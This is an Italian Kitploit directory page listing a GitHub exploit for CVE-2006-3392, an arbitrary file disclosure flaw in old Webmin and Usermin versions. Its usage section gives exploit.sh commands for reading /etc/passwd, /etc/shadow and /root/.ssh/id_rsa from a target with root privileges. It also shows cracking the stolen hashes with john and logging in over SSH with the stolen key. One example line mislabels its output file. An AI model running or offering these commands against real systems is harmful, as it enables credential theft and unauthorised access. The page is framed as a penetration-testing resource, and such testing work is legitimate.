Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2006-3392 — Webmin < 1.290 / Usermin < 1.220 - Divulgazione arbitraria di file | Kitploit
Strumenti/GitHubGitHub/g1vi/cve-2006-3392
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubg1vi/cve-2006-3392

CVE-2006-3392

Webmin < 1.290 / Usermin < 1.220 - Divulgazione arbitraria di file

Vedi Repository
122 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2006-3392

https://www.cvedetails.com/cve/CVE-2006-3392/

Webmin prima della versione 1.290 e Usermin prima della versione 1.220 chiamano la funzione simplify_path prima di decodificare l'HTML, il che consente a un utente malintenzionato remoto di leggere file arbitrari, come dimostrato utilizzando sequenze "..%01", che bypassano la rimozione delle sequenze "../" prima che byte come "%01" vengano rimossi dal nome del file. NOTA: Questo è un problema diverso da CVE-2006-3274.

Utilizzo

Sfoglia qualsiasi file nel filesystem con privilegi di root

root@kitploit:~
./exploit.sh <ip target> <porta target> <file da divulgare>

Esempi

Sfoglia passwd e shadow su 10.10.11.105, elimina l'ombra e cracka gli hash

root@kitploit:~
./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
unshadow passwd shadow > unshadowed
john --wordlist=<la tua wordlist preferita qui> unshadowed

Sfoglia la chiave rsa privata su 10.10.11.105

root@kitploit:~
./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
chmod 600 ./private_key
ssh -i private_key [email protected]

Licenza

Sentiti libero di utilizzare o modificare quando e dove vuoi.

Scarica lo strumento